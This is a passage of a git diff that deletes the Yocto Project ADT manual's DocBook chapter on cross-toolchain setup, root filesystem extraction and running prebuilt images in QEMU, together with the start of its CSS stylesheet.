- <ulink url='&YOCTO_DOCS_REF_URL;#structure-memres-core-script'><filename>oe-init-build-env-memres</filename></ulink>)
- located in the
- <ulink url='&YOCTO_DOCS_DEV_URL;#source-directory'>Source Directory</ulink>.
- </para></listitem>
- <listitem><para><emphasis>Check your Local Configuration File:</emphasis>
- At this point, you should be sure that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink> variable
- in the <filename>local.conf</filename> file found in the
- <filename>conf</filename> directory of the Build Directory
- is set for the target architecture.
- Comments within the <filename>local.conf</filename> file
- list the values you can use for the
- <filename>MACHINE</filename> variable.
- If you do not change the <filename>MACHINE</filename>
- variable, the OpenEmbedded build system uses
- <filename>qemux86</filename> as the default target
- machine when building the cross-toolchain.
- <note>
- You can populate the Build Directory with the
- cross-toolchains for more than a single architecture.
- You just need to edit the <filename>MACHINE</filename>
- variable in the <filename>local.conf</filename> file and
- re-run the <filename>bitbake</filename> command.
- </note></para></listitem>
- <listitem><para><emphasis>Make Sure Your Layers are Enabled:</emphasis>
- Examine the <filename>conf/bblayers.conf</filename> file
- and make sure that you have enabled all the compatible
- layers for your target machine.
- The OpenEmbedded build system needs to be aware of each
- layer you want included when building images and
- cross-toolchains.
- For information on how to enable a layer, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-your-layer'>Enabling Your Layer</ulink>"
- section in the Yocto Project Development Manual.
- </para></listitem>
- <listitem><para><emphasis>Generate the Cross-Toolchain:</emphasis>
- Run <filename>bitbake meta-ide-support</filename> to
- complete the cross-toolchain generation.
- Once the <filename>bitbake</filename> command finishes,
- the cross-toolchain is
- generated and populated within the Build Directory.
- You will notice environment setup files for the
- cross-toolchain that contain the string
- "<filename>environment-setup</filename>" in the
- Build Directory's <filename>tmp</filename> folder.</para>
- <para>Be aware that when you use this method to install the
- toolchain, you still need to separately extract and install
- the sysroot filesystem.
- For information on how to do this, see the
- "<link linkend='extracting-the-root-filesystem'>Extracting the Root Filesystem</link>" section.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-</section>
-
-<section id='setting-up-the-cross-development-environment'>
- <title>Setting Up the Cross-Development Environment</title>
-
- <para>
- Before you can develop using the cross-toolchain, you need to set up the
- cross-development environment by sourcing the toolchain's environment setup script.
- If you used the ADT Installer or hand-installed cross-toolchain,
- then you can find this script in the directory you chose for installation.
- For this release, the default installation directory is
- <filename>&YOCTO_ADTPATH_DIR;</filename>.
- If you installed the toolchain in the
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>,
- you can find the environment setup
- script for the toolchain in the Build Directory's <filename>tmp</filename> directory.
- </para>
-
- <para>
- Be sure to run the environment setup script that matches the
- architecture for which you are developing.
- Environment setup scripts begin with the string
- "<filename>environment-setup</filename>" and include as part of their
- name the architecture.
- For example, the toolchain environment setup script for a 64-bit
- IA-based architecture installed in the default installation directory
- would be the following:
- <literallayout class='monospaced'>
- &YOCTO_ADTPATH_DIR;/environment-setup-x86_64-poky-linux
- </literallayout>
- When you run the setup script, many environment variables are
- defined:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKTARGETSYSROOT'><filename>SDKTARGETSYSROOT</filename></ulink> - The path to the sysroot used for cross-compilation
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKG_CONFIG_PATH'><filename>PKG_CONFIG_PATH</filename></ulink> - The path to the target pkg-config files
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIG_SITE'><filename>CONFIG_SITE</filename></ulink> - A GNU autoconf site file preconfigured for the target
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink> - The minimal command and arguments to run the C compiler
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CXX'><filename>CXX</filename></ulink> - The minimal command and arguments to run the C++ compiler
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CPP'><filename>CPP</filename></ulink> - The minimal command and arguments to run the C preprocessor
- <ulink url='&YOCTO_DOCS_REF_URL;#var-AS'><filename>AS</filename></ulink> - The minimal command and arguments to run the assembler
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink> - The minimal command and arguments to run the linker
- <ulink url='&YOCTO_DOCS_REF_URL;#var-GDB'><filename>GDB</filename></ulink> - The minimal command and arguments to run the GNU Debugger
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STRIP'><filename>STRIP</filename></ulink> - The minimal command and arguments to run 'strip', which strips symbols
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RANLIB'><filename>RANLIB</filename></ulink> - The minimal command and arguments to run 'ranlib'
- <ulink url='&YOCTO_DOCS_REF_URL;#var-OBJCOPY'><filename>OBJCOPY</filename></ulink> - The minimal command and arguments to run 'objcopy'
- <ulink url='&YOCTO_DOCS_REF_URL;#var-OBJDUMP'><filename>OBJDUMP</filename></ulink> - The minimal command and arguments to run 'objdump'
- <ulink url='&YOCTO_DOCS_REF_URL;#var-AR'><filename>AR</filename></ulink> - The minimal command and arguments to run 'ar'
- <ulink url='&YOCTO_DOCS_REF_URL;#var-NM'><filename>NM</filename></ulink> - The minimal command and arguments to run 'nm'
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></ulink> - The toolchain binary prefix for the target tools
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CROSS_COMPILE'><filename>CROSS_COMPILE</filename></ulink> - The toolchain binary prefix for the target tools
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIGURE_FLAGS'><filename>CONFIGURE_FLAGS</filename></ulink> - The minimal arguments for GNU configure
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CFLAGS'><filename>CFLAGS</filename></ulink> - Suggested C flags
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CXXFLAGS'><filename>CXXFLAGS</filename></ulink> - Suggested C++ flags
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LDFLAGS'><filename>LDFLAGS</filename></ulink> - Suggested linker flags when you use CC to link
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CPPFLAGS'><filename>CPPFLAGS</filename></ulink> - Suggested preprocessor flags
- </literallayout>
- </para>
-</section>
-
-<section id='securing-kernel-and-filesystem-images'>
- <title>Securing Kernel and Filesystem Images</title>
-
- <para>
- You will need to have a kernel and filesystem image to boot using your
- hardware or the QEMU emulator.
- Furthermore, if you plan on booting your image using NFS or you want to use the root filesystem
- as the target sysroot, you need to extract the root filesystem.
- </para>
-
- <section id='getting-the-images'>
- <title>Getting the Images</title>
-
- <para>
- To get the kernel and filesystem images, you either have to build them or download
- pre-built versions.
- For an example of how to build these images, see the
- "<ulink url='&YOCTO_DOCS_QS_URL;#qs-buiding-images'>Buiding Images</ulink>"
- section of the Yocto Project Quick Start.
- For an example of downloading pre-build versions, see the
- "<link linkend='using-pre-built'>Example Using Pre-Built Binaries and QEMU</link>"
- section.
- </para>
-
- <para>
- The Yocto Project ships basic kernel and filesystem images for several
- architectures (<filename>x86</filename>, <filename>x86-64</filename>,
- <filename>mips</filename>, <filename>powerpc</filename>, and <filename>arm</filename>)
- that you can use unaltered in the QEMU emulator.
- These kernel images reside in the release
- area - <ulink url='&YOCTO_MACHINES_DL_URL;'></ulink>
- and are ideal for experimentation using Yocto Project.
- For information on the image types you can build using the OpenEmbedded build system,
- see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- chapter in the Yocto Project Reference Manual.
- </para>
-
- <para>
- If you are planning on developing against your image and you are not
- building or using one of the Yocto Project development images
- (e.g. <filename>core-image-*-dev</filename>), you must be sure to
- include the development packages as part of your image recipe.
- </para>
-
- <para>
- If you plan on remotely deploying and debugging your
- application from within the Eclipse IDE, you must have an image
- that contains the Yocto Target Communication Framework (TCF) agent
- (<filename>tcf-agent</filename>).
- You can do this by including the <filename>eclipse-debug</filename>
- image feature.
- <note>
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-features-image'>Image Features</ulink>"
- section in the Yocto Project Reference Manual for information on
- image features.
- </note>
- To include the <filename>eclipse-debug</filename> image feature,
- modify your <filename>local.conf</filename> file in the
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>
- so that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
- variable includes the "eclipse-debug" feature.
- After modifying the configuration file, you can rebuild the image.
- Once the image is rebuilt, the <filename>tcf-agent</filename>
- will be included in the image and is launched automatically after
- the boot.
- </para>
- </section>
-
- <section id='extracting-the-root-filesystem'>
- <title>Extracting the Root Filesystem</title>
-
- <para>
- If you install your toolchain by hand or build it using BitBake and
- you need a root filesystem, you need to extract it separately.
- If you use the ADT Installer to install the ADT, the root
- filesystem is automatically extracted and installed.
- </para>
-
- <para>
- Here are some cases where you need to extract the root filesystem:
- <itemizedlist>
- <listitem><para>You want to boot the image using NFS.
- </para></listitem>
- <listitem><para>You want to use the root filesystem as the
- target sysroot.
- For example, the Eclipse IDE environment with the Eclipse
- Yocto Plug-in installed allows you to use QEMU to boot
- under NFS.</para></listitem>
- <listitem><para>You want to develop your target application
- using the root filesystem as the target sysroot.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- To extract the root filesystem, first <filename>source</filename>
- the cross-development environment setup script to establish
- necessary environment variables.
- If you built the toolchain in the Build Directory, you will find
- the toolchain environment script in the
- <filename>tmp</filename> directory.
- If you installed the toolchain by hand, the environment setup
- script is located in <filename>/opt/poky/&DISTRO;</filename>.
- </para>
-
- <para>
- After sourcing the environment script, use the
- <filename>runqemu-extract-sdk</filename> command and provide the
- filesystem image.
- </para>
-
- <para>
- Following is an example.
- The second command sets up the environment.
- In this case, the setup script is located in the
- <filename>/opt/poky/&DISTRO;</filename> directory.
- The third command extracts the root filesystem from a previously
- built filesystem that is located in the
- <filename>~/Downloads</filename> directory.
- Furthermore, this command extracts the root filesystem into the
- <filename>qemux86-sato</filename> directory:
- <literallayout class='monospaced'>
- $ cd ~
- $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
- $ runqemu-extract-sdk \
- ~/Downloads/core-image-sato-sdk-qemux86-2011091411831.rootfs.tar.bz2 \
- $HOME/qemux86-sato
- </literallayout>
- You could now point to the target sysroot at
- <filename>qemux86-sato</filename>.
- </para>
- </section>
-</section>
-
-<section id='optionally-building-a-toolchain-installer'>
- <title>Optionally Building a Toolchain Installer</title>
-
- <para>
- As an alternative to locating and downloading a toolchain installer,
- you can build the toolchain installer if you have a
- <ulink url='&YOCTO_DOCS_DEV_URL;#build-directory'>Build Directory</ulink>.
- <note>
- Although not the preferred method, it is also possible to use
- <filename>bitbake meta-toolchain</filename> to build the toolchain
- installer.
- If you do use this method, you must separately install and extract
- the target sysroot.
- For information on how to install the sysroot, see the
- "<link linkend='extracting-the-root-filesystem'>Extracting the Root Filesystem</link>"
- section.
- </note>
- </para>
-
- <para>
- To build the toolchain installer and populate the SDK image, use the
- following command:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>image</replaceable> -c populate_sdk
- </literallayout>
- The command results in a toolchain installer that contains the sysroot
- that matches your target root filesystem.
- </para>
-
- <para>
- Another powerful feature is that the toolchain is completely
- self-contained.
- The binaries are linked against their own copy of
- <filename>libc</filename>, which results in no dependencies
- on the target system.
- To achieve this, the pointer to the dynamic loader is
- configured at install time since that path cannot be dynamically
- altered.
- This is the reason for a wrapper around the
- <filename>populate_sdk</filename> archive.
- </para>
-
- <para>
- Another feature is that only one set of cross-canadian toolchain
- binaries are produced per architecture.
- This feature takes advantage of the fact that the target hardware can
- be passed to <filename>gcc</filename> as a set of compiler options.
- Those options are set up by the environment script and contained in
- variables such as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink>.
- This reduces the space needed for the tools.
- Understand, however, that a sysroot is still needed for every target
- since those binaries are target-specific.
- </para>
-
- <para>
- Remember, before using any BitBake command, you
- must source the build environment setup script
- (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-memres-core-script'><filename>oe-init-build-env-memres</filename></ulink>)
- located in the Source Directory and you must make sure your
- <filename>conf/local.conf</filename> variables are correct.
- In particular, you need to be sure the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable matches the architecture for which you are building and that
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>
- variable is correctly set if you are building a toolchain designed to
- run on an architecture that differs from your current development host
- machine (i.e. the build machine).
- </para>
-
- <para>
- When the <filename>bitbake</filename> command completes, the toolchain
- installer will be in
- <filename>tmp/deploy/sdk</filename> in the Build Directory.
- <note>
- By default, this toolchain does not build static binaries.
- If you want to use the toolchain to build these types of libraries,
- you need to be sure your image has the appropriate static
- development libraries.
- Use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>
- variable inside your <filename>local.conf</filename> file to
- install the appropriate library packages.
- Following is an example using <filename>glibc</filename> static
- development libraries:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = " glibc-staticdev"
- </literallayout>
- </note>
- </para>
-</section>
-
-<section id='optionally-using-an-external-toolchain'>
- <title>Optionally Using an External Toolchain</title>
-
- <para>
- You might want to use an external toolchain as part of your
- development.
- If this is the case, the fundamental steps you need to accomplish
- are as follows:
- <itemizedlist>
- <listitem><para>
- Understand where the installed toolchain resides.
- For cases where you need to build the external toolchain, you
- would need to take separate steps to build and install the
- toolchain.
- </para></listitem>
- <listitem><para>
- Make sure you add the layer that contains the toolchain to
- your <filename>bblayers.conf</filename> file through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- Set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTERNAL_TOOLCHAIN'><filename>EXTERNAL_TOOLCHAIN</filename></ulink>
- variable in your <filename>local.conf</filename> file
- to the location in which you installed the toolchain.
- </para></listitem>
- </itemizedlist>
- A good example of an external toolchain used with the Yocto Project
- is <trademark class='registered'>Mentor Graphics</trademark>
- Sourcery G++ Toolchain.
- You can see information on how to use that particular layer in the
- <filename>README</filename> file at
- <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
- You can find further information by reading about the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TCMODE'><filename>TCMODE</filename></ulink>
- variable in the Yocto Project Reference Manual's variable glossary.
- </para>
-</section>
-
- <section id='using-pre-built'>
- <title>Example Using Pre-Built Binaries and QEMU</title>
-
- <para>
- If hardware, libraries and services are stable, you can get started by using a pre-built binary
- of the filesystem image, kernel, and toolchain and run it using the QEMU emulator.
- This scenario is useful for developing application software.
- </para>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref="figures/using-a-pre-built-image.png" format="PNG" align='center' scalefit='1'/>
- </imageobject>
- <caption>
- <para>Using a Pre-Built Image</para>
- </caption>
- </mediaobject>
-
- <para>
- For this scenario, you need to do several things:
- </para>
-
- <itemizedlist>
- <listitem><para>Install the appropriate stand-alone toolchain tarball.</para></listitem>
- <listitem><para>Download the pre-built image that will boot with QEMU.
- You need to be sure to get the QEMU image that matches your target machine’s
- architecture (e.g. x86, ARM, etc.).</para></listitem>
- <listitem><para>Download the filesystem image for your target machine's architecture.
- </para></listitem>
- <listitem><para>Set up the environment to emulate the hardware and then start the QEMU emulator.
- </para></listitem>
- </itemizedlist>
-
- <section id='installing-the-toolchain'>
- <title>Installing the Toolchain</title>
-
- <para>
- You can download a tarball installer, which includes the
- pre-built toolchain, the <filename>runqemu</filename>
- script, and support files from the appropriate directory under
- <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'></ulink>.
- Toolchains are available for 32-bit and 64-bit x86 development
- systems from the <filename>i686</filename> and
- <filename>x86_64</filename> directories, respectively.
- The toolchains the Yocto Project provides are based off the
- <filename>core-image-sato</filename> image and contain
- libraries appropriate for developing against that image.
- Each type of development system supports five or more target
- architectures.
- </para>
-
- <para>
- The names of the tarball installer scripts are such that a
- string representing the host system appears first in the
- filename and then is immediately followed by a string
- representing the target architecture.
- </para>
-
- <literallayout class='monospaced'>
- poky-glibc-<replaceable>host_system</replaceable>-<replaceable>image_type</replaceable>-<replaceable>arch</replaceable>-toolchain-<replaceable>release_version</replaceable>.sh
-
- Where:
- <replaceable>host_system</replaceable> is a string representing your development system:
-
- i686 or x86_64.
-
- <replaceable>image_type</replaceable> is a string representing the image you wish to
- develop a Software Development Toolkit (SDK) for use against.
- The Yocto Project builds toolchain installers using the
- following BitBake command:
-
- bitbake core-image-sato -c populate_sdk
-
- <replaceable>arch</replaceable> is a string representing the tuned target architecture:
-
- i586, x86_64, powerpc, mips, armv7a or armv5te
-
- <replaceable>release_version</replaceable> is a string representing the release number of the
- Yocto Project:
-
- &DISTRO;, &DISTRO;+snapshot
- </literallayout>
-
- <para>
- For example, the following toolchain installer is for a 64-bit
- development host system and a i586-tuned target architecture
- based off the SDK for <filename>core-image-sato</filename>:
- <literallayout class='monospaced'>
- poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
- </literallayout>
- </para>
-
- <para>
- Toolchains are self-contained and by default are installed into
- <filename>/opt/poky</filename>.
- However, when you run the toolchain installer, you can choose an
- installation directory.
- </para>
-
- <para>
- The following command shows how to run the installer given a toolchain tarball
- for a 64-bit x86 development host system and a 32-bit x86 target architecture.
- You must change the permissions on the toolchain
- installer script so that it is executable.
- </para>
-
- <para>
- The example assumes the toolchain installer is located in <filename>~/Downloads/</filename>.
- <note>
- If you do not have write permissions for the directory into which you are installing
- the toolchain, the toolchain installer notifies you and exits.
- Be sure you have write permissions in the directory and run the installer again.
- </note>
- </para>
-
- <para>
- <literallayout class='monospaced'>
- $ ~/Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
- </literallayout>
- </para>
-
- <para>
- For more information on how to install tarballs, see the
- "<ulink url='&YOCTO_DOCS_ADT_URL;#using-an-existing-toolchain-tarball'>Using a Cross-Toolchain Tarball</ulink>" and
- "<ulink url='&YOCTO_DOCS_ADT_URL;#using-the-toolchain-from-within-the-build-tree'>Using BitBake and the Build Directory</ulink>" sections in the Yocto Project Application Developer's Guide.
- </para>
- </section>
-
- <section id='downloading-the-pre-built-linux-kernel'>
- <title>Downloading the Pre-Built Linux Kernel</title>
-
- <para>
- You can download the pre-built Linux kernel suitable for running in the QEMU emulator from
- <ulink url='&YOCTO_QEMU_DL_URL;'></ulink>.
- Be sure to use the kernel that matches the architecture you want to simulate.
- Download areas exist for the five supported machine architectures:
- <filename>qemuarm</filename>, <filename>qemumips</filename>, <filename>qemuppc</filename>,
- <filename>qemux86</filename>, and <filename>qemux86-64</filename>.
- </para>
-
- <para>
- Most kernel files have one of the following forms:
- <literallayout class='monospaced'>
- *zImage-qemu<replaceable>arch</replaceable>.bin
- vmlinux-qemu<replaceable>arch</replaceable>.bin
-
- Where:
- <replaceable>arch</replaceable> is a string representing the target architecture:
- x86, x86-64, ppc, mips, or arm.
- </literallayout>
- </para>
-
- <para>
- You can learn more about downloading a Yocto Project kernel in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#local-kernel-files'>Yocto Project Kernel</ulink>"
- bulleted item in the Yocto Project Development Manual.
- </para>
- </section>
-
- <section id='downloading-the-filesystem'>
- <title>Downloading the Filesystem</title>
-
- <para>
- You can also download the filesystem image suitable for your target architecture from
- <ulink url='&YOCTO_QEMU_DL_URL;'></ulink>.
- Again, be sure to use the filesystem that matches the architecture you want
- to simulate.
- </para>
-
- <para>
- The filesystem image has two tarball forms: <filename>ext3</filename> and
- <filename>tar</filename>.
- You must use the <filename>ext3</filename> form when booting an image using the
- QEMU emulator.
- The <filename>tar</filename> form can be flattened out in your host development system
- and used for build purposes with the Yocto Project.
- <literallayout class='monospaced'>
- core-image-<replaceable>profile</replaceable>-qemu<replaceable>arch</replaceable>.ext3
- core-image-<replaceable>profile</replaceable>-qemu<replaceable>arch</replaceable>.tar.bz2
-
- Where:
- <replaceable>profile</replaceable> is the filesystem image's profile:
- lsb, lsb-dev, lsb-sdk, lsb-qt3, minimal, minimal-dev, sato,
- sato-dev, or sato-sdk. For information on these types of image
- profiles, see the "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- chapter in the Yocto Project Reference Manual.
-
- <replaceable>arch</replaceable> is a string representing the target architecture:
- x86, x86-64, ppc, mips, or arm.
- </literallayout>
- </para>
- </section>
-
- <section id='setting-up-the-environment-and-starting-the-qemu-emulator'>
- <title>Setting Up the Environment and Starting the QEMU Emulator</title>
-
- <para>
- Before you start the QEMU emulator, you need to set up the emulation environment.
- The following command form sets up the emulation environment.
- <literallayout class='monospaced'>
- $ source &YOCTO_ADTPATH_DIR;/environment-setup-<replaceable>arch</replaceable>-poky-linux-<replaceable>if</replaceable>
-
- Where:
- <replaceable>arch</replaceable> is a string representing the target architecture:
- i586, x86_64, ppc603e, mips, or armv5te.
-
- <replaceable>if</replaceable> is a string representing an embedded application binary interface.
- Not all setup scripts include this string.
- </literallayout>
- </para>
-
- <para>
- Finally, this command form invokes the QEMU emulator
- <literallayout class='monospaced'>
- $ runqemu <replaceable>qemuarch</replaceable> <replaceable>kernel-image</replaceable> <replaceable>filesystem-image</replaceable>
-
- Where:
- <replaceable>qemuarch</replaceable> is a string representing the target architecture: qemux86, qemux86-64,
- qemuppc, qemumips, or qemuarm.
-
- <replaceable>kernel-image</replaceable> is the architecture-specific kernel image.
-
- <replaceable>filesystem-image</replaceable> is the .ext3 filesystem image.
-
- </literallayout>
- </para>
-
- <para>
- Continuing with the example, the following two commands setup the emulation
- environment and launch QEMU.
- This example assumes the root filesystem (<filename>.ext3</filename> file) and
- the pre-built kernel image file both reside in your home directory.
- The kernel and filesystem are for a 32-bit target architecture.
- <literallayout class='monospaced'>
- $ cd $HOME
- $ source &YOCTO_ADTPATH_DIR;/environment-setup-i586-poky-linux
- $ runqemu qemux86 bzImage-qemux86.bin \
- core-image-sato-qemux86.ext3
- </literallayout>
- </para>
-
- <para>
- The environment in which QEMU launches varies depending on the filesystem image and on the
- target architecture.
- For example, if you source the environment for the ARM target
- architecture and then boot the minimal QEMU image, the emulator comes up in a new
- shell in command-line mode.
- However, if you boot the SDK image, QEMU comes up with a GUI.
- <note>Booting the PPC image results in QEMU launching in the same shell in
- command-line mode.</note>
- </para>
- </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/adt-manual/adt-style.css b/documentation/adt-manual/adt-style.css
deleted file mode 100644
index d722ad4b7f..0000000000
--- a/documentation/adt-manual/adt-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/adt-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
